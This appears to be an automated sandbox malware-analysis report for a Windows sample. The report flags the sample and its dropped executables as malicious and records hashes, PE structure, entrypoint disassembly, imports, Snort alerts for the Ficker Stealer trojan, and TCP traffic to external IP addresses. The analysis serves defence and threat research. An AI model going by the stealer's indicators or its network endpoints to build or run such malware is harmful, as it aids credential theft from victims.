                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):2897408
                                                                                                                                                                                                  Entropy (8bit):7.96408094988944
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:7raLX5hpaf7bDXl90zsxUMYKJY3j3AX2ET8gBaWWHUsqo/R6O4p3m084KUz:CLX5hpafT7c8UMCz3AGE4WW6vO47zK
                                                                                                                                                                                                  MD5:A77F1ED5881D44FC95BF3DA05C349385
                                                                                                                                                                                                  SHA1:7A80066B7F8B335CCC1A85D9847A29251F2875CA
                                                                                                                                                                                                  SHA-256:58BE03E1A79FEDF4F6181C0CE9D819F85CB656B00831C55673E15433183D0206
                                                                                                                                                                                                  SHA-512:308A8BFBC3396C53AB3D38D55238C692EAAF42BFB1FA074CF432F6C980AB790144697A726D7E8B60DB82E60A600A280879FB5D833E4DD8EB6EEF8198AA368641
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9...............0.............`.N.. ... ....@.. ....................... v......W,...@.................................:...P.... ............................................................................................................. ..... ...l.................. ..`.rsrc....... .......p..............@..@ ............................@..B.idata... ..........................@....themida..G.........................`....boot....2'...N..2'.................`..`................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BEE7.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):285184
                                                                                                                                                                                                  Entropy (8bit):5.903861637679361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:50Zpb7yzvg85vlUjHKKGexbDbZ5xQjfskZBP2edIMRpYQ4RxFGGEb9vUjX4xjEF:Rvf5vlUjH3ZnhQog2etRiRDFLwUjIi
                                                                                                                                                                                                  MD5:8EF1AE58E545946BACA2DBC17E135577
                                                                                                                                                                                                  SHA1:5C885447330A3BFD39A1432E876F5315227DC63A
                                                                                                                                                                                                  SHA-256:0C4F067DB78D493CF8966B08555FF8A50E920FE4737786CEA5BE5348D9785C3C
                                                                                                                                                                                                  SHA-512:35CA7CFEDBD9CD70913A57CA1E1B2BE976E8FB067471805B70867B232A8B89772D773EAFB0FE49AA7BCC14E6A49D85918657EE3EBF2785D15F5E18B5D660EEE2
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0..'t..tt..tt..t..Wt]..t..bte..t..Vt...t}.ot...tt..t...t..Stu..t..ftu..t..atu..tRicht..t................PE..L....F.`.............................y............@............................................................................x....`...D..........................`................................w..@............................................text............................... ..`.data....J..........................@....rsrc....D...`...F..................@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\DA6F.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2893312
                                                                                                                                                                                                  Entropy (8bit):7.966231546908748
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:pPZ9vjxrX/MNg5FXRmH/pJFiV4dYPGTeZ92ns7Hmph8+zf9OChgf5sU/MAqMn:1fycFXM/ViOWPseaEGp++zcIK5j0A9
                                                                                                                                                                                                  MD5:D6F23ADF6D5B20A214640C56E570AB2E
                                                                                                                                                                                                  SHA1:F66B986576F1A3210F500D20344E71FE7F9A9F7D
                                                                                                                                                                                                  SHA-256:6524CE487DE16CAF66B4697931AC9A4672FCDD1953E56C68DE0CA464D967E8D2
                                                                                                                                                                                                  SHA-512:C146151303F9B2FB138E8216C747E152ACB2261B31DDAFEED8706A743946E0010A44BAC2E0FCE3EBBAC431E7A546BDB2552102E32FD5E606536772E80BFC5499
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 23%, Browse
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~...............0..............IM.. ... ....@.. ........................r.......,...@.................................:`..P.... ..D........................................................................................................... ..... ...j.................. ..`.rsrc...D.... .......n..............@..@ .....@......................@..B.idata... ...`......................@....themida..D.........................`....boot.....%..@M...%.................`..`................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\E8E7.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399360
                                                                                                                                                                                                  Entropy (8bit):3.724595021237698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:oE8ijGrr1LjzJMhzhuxmk/dbdX4QlaDcVq:iioD
                                                                                                                                                                                                  MD5:5E34695C9F46F1E69CE731D3B7359C88
                                                                                                                                                                                                  SHA1:E1E5BB43F0C7556BCCCC8CB698F854694BDC024A
                                                                                                                                                                                                  SHA-256:97F96815D81F9C1C8EDE31F1C21FDA2BEE7CBAB3490184EF833D9D2E8C17E6FC
                                                                                                                                                                                                  SHA-512:659FA0B695942C35DD4EF499D6C01D9B2A8C23254EA31465A126FD71A0D542EE71DA9349FFC8226083393ED37C0668F63C97CC7EF3E014EAE793B1F1BA7D6B43
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)...............0..............-... ...@....@.. ....................................@..................................-..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H......../...3...........................................................0..........~....u....s....z&.....*.................2(.... 3w..j*....r...p(....*.s....%.}..........s....o....9....s....z*....(.........*2.s....(....*...v.(......rh..p~....o....(....*....{....*.0..i........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....(....o....}....*....0...........o......o....(.....(.....o....*.6..(....(....*...0..E.......~.....s.......8"........
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\FB48.exe
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):189440
                                                                                                                                                                                                  Entropy (8bit):6.078636969998498
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:7NmwVdUzOLggn5R0lfOghEw9v1LdlrZMAM/sZu537k2Vy92GvBIvT3KyO+YV1pwD:7NtVdTl6hEw9v1LdlrZMAM/sZu537k2n
                                                                                                                                                                                                  MD5:0198C5A612317A06F11ABBE95294408E
                                                                                                                                                                                                  SHA1:DB2D9F7DA2271C69CD5C4E062DB22F04D0FAB7B9
                                                                                                                                                                                                  SHA-256:11CE64503803FA5F190A0AD45CA4A7906685EF9DB939EF75F50A548944D8664E
                                                                                                                                                                                                  SHA-512:8C4FA10884B616FC071C12393F1D7597E230C4B7EF7ADFA3C7254DB40E76BA2C68D30FFCE6323747E5B845493AC53BDBF892E5D13D81800B93858FCEAB48CEFA
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.a............................. ....... ....@.. .......................`............@.................................$...W.......~....................@....................................................... ..................H...........I!&...%+H.... ......................@....text............................... ..`.rsrc...~...........................@..@............. ...................... ..`.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\rfudbri
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):342528
                                                                                                                                                                                                  Entropy (8bit):5.957059759994645
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:B9LMytcasE/LEUZ/TPrMXiT1B18x93KX:ztcasE/L1jrMmH18x96X
                                                                                                                                                                                                  MD5:743F8FEC87EBF7C5D6B392261EC3988F
                                                                                                                                                                                                  SHA1:1BC862EECDE55F2C1DE69BC9E3FDD7468DE373D0
                                                                                                                                                                                                  SHA-256:C9F18CC71C7A1FA61D43A32DFB858F9AA247324A188F8182981B853266D3B1C7
                                                                                                                                                                                                  SHA-512:59156212C7C800920DA3A3F22191799AC4632DDA5A3128B4F7BB8A2856A924DEDF16C470766AC37EF431DF7CC76CC98DF4BB1AF180C70584CAF71CDD28819413
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............q...q...q....O..q....z..q....{..q....B..q...q..Nq....~..q....K..q....L..q..Rich.q..................PE..L...E.k_..........................................@.................................*.......................................p...x.... ...H...................p..........................................@............................................text.............................. ..`.data....P..........................@....rsrc....H... ...J..................@..@.reloc...+...p...,..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\rfudbri:Zone.Identifier
                                                                                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):5.957059759994645
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                  File name:X5lLjSzDd8.exe
                                                                                                                                                                                                  File size:342528
                                                                                                                                                                                                  MD5:743f8fec87ebf7c5d6b392261ec3988f
                                                                                                                                                                                                  SHA1:1bc862eecde55f2c1de69bc9e3fdd7468de373d0
                                                                                                                                                                                                  SHA256:c9f18cc71c7a1fa61d43a32dfb858f9aa247324a188f8182981b853266d3b1c7
                                                                                                                                                                                                  SHA512:59156212c7c800920da3a3f22191799ac4632dda5a3128b4f7bb8a2856a924dedf16c470766ac37ef431df7cc76cc98df4bb1af180c70584caf71cdd28819413
                                                                                                                                                                                                  SSDEEP:6144:B9LMytcasE/LEUZ/TPrMXiT1B18x93KX:ztcasE/L1jrMmH18x96X
                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............q...q...q....O..q....z..q....{..q....B..q...q..Nq....~..q....K..q....L..q..Rich.q..................PE..L...E.k_...........

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:aedaae9ecea62aa2

                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Entrypoint:0x41c180
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                                  Time Stamp:0x5F6BA345 [Wed Sep 23 19:34:29 2020 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                  Import Hash:b2e29795cf26e2405a95e142d139ea34

                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  mov edi, edi
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  call 00007F80409FA02Bh
                                                                                                                                                                                                  call 00007F80409F5786h
                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  mov edi, edi
                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                  push FFFFFFFEh
                                                                                                                                                                                                  push 0043A1D0h
                                                                                                                                                                                                  push 0041FBD0h
                                                                                                                                                                                                  mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                  push eax
                                                                                                                                                                                                  add esp, FFFFFF98h
                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                  push esi
                                                                                                                                                                                                  push edi
                                                                                                                                                                                                  mov eax, dword ptr [0043C0F8h]
                                                                                                                                                                                                  xor dword ptr [ebp-08h], eax
                                                                                                                                                                                                  xor eax, ebp
                                                                                                                                                                                                  push eax
                                                                                                                                                                                                  lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                  mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                  mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                                  lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                                  push eax
                                                                                                                                                                                                  call dword ptr [00401074h]
                                                                                                                                                                                                  cmp dword ptr [01FC00A0h], 00000000h
                                                                                                                                                                                                  jne 00007F80409F5780h
                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                  call dword ptr [00401144h]
                                                                                                                                                                                                  call 00007F80409F5903h
                                                                                                                                                                                                  mov dword ptr [ebp-6Ch], eax
                                                                                                                                                                                                  call 00007F80409FBC5Bh
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  jne 00007F80409F577Ch
                                                                                                                                                                                                  push 0000001Ch
                                                                                                                                                                                                  call 00007F80409F58C0h
                                                                                                                                                                                                  add esp, 04h
                                                                                                                                                                                                  call 00007F80409FB5B8h
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  jne 00007F80409F577Ch
                                                                                                                                                                                                  push 00000010h
                                                                                                                                                                                                  call 00007F80409F58ADh
                                                                                                                                                                                                  add esp, 04h
                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                  call 00007F80409F7E73h
                                                                                                                                                                                                  add esp, 04h
                                                                                                                                                                                                  call 00007F80409FB4CBh
                                                                                                                                                                                                  mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                  call 00007F80409FB0AFh
                                                                                                                                                                                                  test eax, eax

                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                  • [LNK] VS2010 build 30319
                                                                                                                                                                                                  • [ASM] VS2010 build 30319
                                                                                                                                                                                                  • [ C ] VS2010 build 30319
                                                                                                                                                                                                  • [C++] VS2010 build 30319
                                                                                                                                                                                                  • [RES] VS2010 build 30319
                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3a8700x78.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1bc20000x48d0.rsrc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1bc70000x1bdc.reloc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x12800x1c.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x199900x40.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x20c.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                  Sections

                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .text0x10000x3a4e40x3a600False0.596744512848data6.99711760702IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .data0x3c0000x1b850a40x1a00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rsrc0x1bc20000x48d00x4a00False0.693412162162data6.11653354959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .reloc0x1bc70000x12b100x12c00False0.0806901041667data1.04064012335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                  Resources

                                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                  RT_ICON0x1bc22a00x25a8dataSpanishParaguay
                                                                                                                                                                                                  RT_ICON0x1bc48480x10a8dataSpanishParaguay
                                                                                                                                                                                                  RT_STRING0x1bc5b300xe2dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                  RT_STRING0x1bc5c180x30adataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                  RT_STRING0x1bc5f280x5fadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                  RT_STRING0x1bc65280x154dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                  RT_STRING0x1bc66800x24adataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                  RT_ACCELERATOR0x1bc59800x80dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                  RT_ACCELERATOR0x1bc59180x68dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                  RT_GROUP_ICON0x1bc58f00x22dataSpanishParaguay
                                                                                                                                                                                                  RT_VERSION0x1bc5a000x12cdataDivehi; Dhivehi; MaldivianMaldives

                                                                                                                                                                                                  Imports

                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  KERNEL32.dllSetDllDirectoryW, InterlockedIncrement, _lwrite, SetFirmwareEnvironmentVariableA, GetSystemWindowsDirectoryW, GetNamedPipeHandleStateA, SetHandleInformation, GetComputerNameW, GetModuleHandleW, GetTickCount, GetProcessHeap, GetConsoleAliasesLengthA, ConvertFiberToThread, ReadConsoleW, GetCompressedFileSizeW, GetSystemWow64DirectoryA, TlsSetValue, LoadLibraryW, GetConsoleMode, CopyFileW, SetVolumeMountPointA, GetVersionExW, HeapCreate, HeapValidate, GetModuleFileNameW, CreateActCtxA, GetACP, GetStartupInfoW, WritePrivateProfileStringW, VerifyVersionInfoW, FindFirstFileExA, GetLastError, IsDBCSLeadByteEx, SetLastError, SetWaitableTimer, CreateNamedPipeA, CopyFileA, FindClose, GetPrivateProfileStringA, ProcessIdToSessionId, LocalAlloc, IsWow64Process, SetCurrentDirectoryW, GetVolumePathNamesForVolumeNameA, GetModuleFileNameA, SetConsoleCursorInfo, GetProcessShutdownParameters, FreeEnvironmentStringsW, WriteProfileStringW, BuildCommDCBA, VirtualProtect, CompareStringA, GetSystemRegistryQuota, ReadConsoleInputW, FileTimeToLocalFileTime, CreateWaitableTimerA, GetSystemTime, TlsFree, CommConfigDialogW, CloseHandle, CreateFileW, SetStdHandle, GetConsoleCP, SetFilePointer, LCMapStringW, OutputDebugStringW, WriteConsoleW, FlushFileBuffers, GetLongPathNameA, WriteConsoleInputW, OutputDebugStringA, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetCommandLineA, HeapSetInformation, IsBadReadPtr, RaiseException, RtlUnwind, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, GetProcAddress, ExitProcess, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, TlsAlloc, TlsGetValue, WriteFile, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapFree, GetOEMCP, GetCPInfo, IsValidCodePage, GetStringTypeW, MultiByteToWideChar
                                                                                                                                                                                                  USER32.dllGetMessageTime, GetCaretBlinkTime, GetMenuItemID, GetMenuBarInfo, GetMonitorInfoA, GetCursorInfo, GetListBoxInfo, GetMenuInfo, GetComboBoxInfo
                                                                                                                                                                                                  GDI32.dllGetBitmapBits
                                                                                                                                                                                                  WINHTTP.dllWinHttpWriteData
                                                                                                                                                                                                  MSIMG32.dllGradientFill

                                                                                                                                                                                                  Version Infos

                                                                                                                                                                                                  DescriptionData
                                                                                                                                                                                                  Translations0x0022 0x023c

                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                  SpanishParaguay
                                                                                                                                                                                                  Divehi; Dhivehi; MaldivianMaldives

                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  11/18/21-10:31:36.902511TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34987080192.168.2.78.209.71.17
                                                                                                                                                                                                  11/18/21-10:31:39.301982TCP2031132ET TROJAN Win32/Ficker Stealer Activity M34987180192.168.2.78.209.71.17

                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.494965076 CET4976080192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.574537992 CET8049760188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.574652910 CET4976080192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.574858904 CET4976080192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.574886084 CET4976080192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.656431913 CET8049760188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.696490049 CET8049760188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.696672916 CET4976080192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.725833893 CET4976080192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.760392904 CET4976180192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.804445028 CET8049760188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.814476013 CET8049761188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.814590931 CET4976180192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.814765930 CET4976180192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.814807892 CET4976180192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.870481968 CET8049761188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.910515070 CET8049761188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.910691023 CET4976180192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.949660063 CET4976180192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:09.008514881 CET8049761188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.372181892 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.438853025 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.438990116 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.439167976 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.547305107 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609196901 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609236002 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609249115 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609266043 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609282017 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609297991 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609309912 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609314919 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609330893 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609348059 CET8049762188.225.85.124192.168.2.7
